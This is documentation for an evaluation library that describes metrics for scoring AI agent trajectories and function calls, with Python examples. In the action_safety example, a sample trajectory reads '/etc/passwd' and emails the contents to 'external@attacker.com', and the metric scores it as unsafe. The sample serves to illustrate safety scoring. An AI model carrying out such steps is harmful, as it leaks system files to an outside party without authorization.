Agents & Function Calling

11 metrics for evaluating agent trajectories, tool use, reasoning quality, and function call correctness. All run locally via evaluate().

📝
TL;DR
  • 7 agent trajectory metrics (continuous 0.0-1.0): task completion, efficiency, tool selection, safety, reasoning
  • 4 function calling metrics (binary 0/1): name match, parameter validation, accuracy, exact match
  • task_completion, action_safety, and reasoning_quality support augment=True

These metrics evaluate how well an agent performed a task and whether it called the right functions with the right parameters.

from fi.evals import evaluate

result = evaluate(
    "task_completion",
    output="Booked flight AA123 from SFO to JFK on March 15. Confirmation sent to user.",
    context="User asked to book the cheapest direct flight from SFO to JFK on March 15.",
)
print(result.score)   # 0.95

Agent Trajectory Metrics

Pass the full agent trajectory (tool calls, intermediate steps, final output) as output, and the task description as context. All return 0.0 to 1.0.

MetricWhat it measures
task_completionWhether the agent completed the assigned task
step_efficiencyWhether the agent reached its goal in minimal steps
tool_selection_accuracyWhether the agent selected the correct tools
trajectory_scoreOverall trajectory quality covering tool use, ordering, and progress
goal_progressHow much progress was made toward the goal
action_safetyWhether the agent’s actions are safe and authorized
reasoning_qualityQuality of the agent’s reasoning chain

task_completion

Whether the agent completed the assigned task. Supports augment=True.

result = evaluate(
    "task_completion",
    output="Created Jira ticket PROJ-452 'Fix login timeout' assigned to @alice.",
    context="User asked: create a Jira ticket for the login timeout bug and assign it to Alice.",
)
# score → 0.97

step_efficiency

Whether the agent reached its goal in minimal steps without unnecessary detours.

result = evaluate(
    "step_efficiency",
    output="Step 1: search_users('alice') → found. Step 2: create_ticket(title='Fix login timeout', assignee='alice') → PROJ-452.",
    context="User asked: create a Jira ticket for the login timeout bug and assign it to Alice.",
)
# score → 0.92

tool_selection_accuracy

Whether the agent selected the correct tools for the task.

result = evaluate(
    "tool_selection_accuracy",
    output="Called: [search_flights, book_flight, send_confirmation]",
    context="User asked to book a flight and send a confirmation email.",
    expected_output="[search_flights, book_flight, send_confirmation]",
)
# score → 1.0

trajectory_score

Overall trajectory quality covering tool use, ordering, and task progress.

result = evaluate(
    "trajectory_score",
    output="Step 1: search_db('revenue Q4') → $2.3M. Step 2: generate_chart(data) → chart.png. Step 3: send_email(to='cfo', attachment='chart.png').",
    context="User asked: pull Q4 revenue, chart it, and email the chart to the CFO.",
)
# score → 0.94

goal_progress

How much progress was made, even if the task wasn’t fully completed. Useful for partial-credit scoring.

result = evaluate(
    "goal_progress",
    output="Step 1: search_flights('SFO','JFK','2025-03-15') → 3 results. Step 2: agent timed out.",
    context="User asked to book the cheapest direct flight from SFO to JFK on March 15.",
)
# score → 0.45

action_safety

Whether the agent’s actions are safe — no destructive operations, data leaks, or unauthorized access. Supports augment=True.

result = evaluate(
    "action_safety",
    output="Step 1: read_file('/etc/passwd'). Step 2: send_email(to='external@attacker.com', body=contents).",
    context="User asked to check system health.",
)
# score → 0.05

reasoning_quality

Quality of the agent’s reasoning chain — logical, well-structured, leads to the correct conclusion. Supports augment=True.

result = evaluate(
    "reasoning_quality",
    output="Thought: User needs Q4 revenue. I should query the database first. Action: query_db('SELECT SUM(revenue) FROM sales WHERE quarter=Q4') → $2.3M.",
    context="User asked: what was our Q4 revenue?",
)
# score → 0.88

Function Calling Metrics

Validate whether the agent called the right function with the right parameters. All are binary (0 or 1). Pass actual and expected function calls as JSON strings.

MetricWhat it checks
function_name_matchWhether the function name matches (ignores parameters)
parameter_validationWhether function parameters match (names and values)
function_call_accuracyOverall correctness — function name and parameters together
function_call_exact_matchStrict exact match — JSON must be identical

function_name_match

Whether the function name matches. Ignores parameters.

result = evaluate(
    "function_name_match",
    output='{"name": "get_weather", "arguments": {"city": "NYC"}}',
    expected_output='{"name": "get_weather", "arguments": {"city": "San Francisco"}}',
)
# score → 1.0 (name matches, params ignored)

parameter_validation

Whether function parameters match (names and values).

result = evaluate(
    "parameter_validation",
    output='{"name": "get_weather", "arguments": {"city": "San Francisco", "units": "celsius"}}',
    expected_output='{"name": "get_weather", "arguments": {"city": "San Francisco", "units": "celsius"}}',
)
# score → 1.0

function_call_accuracy

Overall correctness — function name and parameters together.

result = evaluate(
    "function_call_accuracy",
    output='{"name": "create_event", "arguments": {"title": "Team Sync", "date": "2025-03-20"}}',
    expected_output='{"name": "create_event", "arguments": {"title": "Team Sync", "date": "2025-03-20"}}',
)
# score → 1.0

function_call_exact_match

Strict exact match — JSON must be identical.

result = evaluate(
    "function_call_exact_match",
    output='{"name": "search_docs", "arguments": {"query": "refund policy", "top_k": 5}}',
    expected_output='{"name": "search_docs", "arguments": {"query": "refund policy", "top_k": 5}}',
)
# score → 1.0

result = evaluate(
    "function_call_exact_match",
    output='{"name": "search_docs", "arguments": {"query": "refund policy", "top_k": 3}}',
    expected_output='{"name": "search_docs", "arguments": {"query": "refund policy", "top_k": 5}}',
)
# score → 0.0 (top_k differs)

Augmented Evaluation

task_completion, action_safety, and reasoning_quality support augment=True. This runs the local heuristic first, then refines with an LLM.

from fi.evals import evaluate

result = evaluate(
    "task_completion",
    output="Booked flight AA123. Confirmation #BK-9921 sent to user@email.com.",
    context="User asked to book the cheapest direct flight from SFO to JFK on March 15 and email the confirmation.",
    model="gemini/gemini-2.5-flash",
    augment=True,
)

print(result.metadata["engine"])  # "local+llm"
Was this page helpful?

Questions & Discussion